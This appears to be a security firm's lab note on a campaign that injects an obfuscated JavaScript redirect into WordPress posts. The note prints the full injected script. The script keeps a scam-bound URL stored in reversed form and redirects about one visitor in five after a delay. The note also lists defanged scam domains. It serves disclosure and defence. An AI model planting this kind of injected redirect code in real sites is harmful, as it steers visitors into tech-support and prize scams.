Reversed URLs Randomly Redirect to Scams

Labs Note

We are seeing hundreds of infected WordPress sites with the following scripts (in one line) injected in random places in wp_posts table.

$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www/​/:ptth'=ferh.​noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1=​=3){var delay = 15000;setTimeout(​$vTB$I_919AeEAw2z$KX(0), delay);}

This code randomly (with probability of around 20%), after a timeout of 15 seconds, redirects visitors various scam sites (e.g. “Browser review to win an iPad” or “tech support” scams).

The redirect chains usually include domains like3cal1ingc0nstant3111212[.]tk, 3worthysupp0rt310121[.]tk, techsupport60512123456[.]tk, 2bestsupp0rt310121[.]tk, etc. (they change frequently)and balans.shahterworld[.]org

The very first redirect URL is hard-coded in the reversed form (we see this obfuscation trick quite often) inside the injected scripts. In the above case the redirect code decodes to this


It’s is not the only redirect URL used in this campaign. We checked over 200 infected sites and found these 4 URLs – all of them on hacked sites themselves.


As always, if you need a professional help to clean and protect your site, you can count on us.

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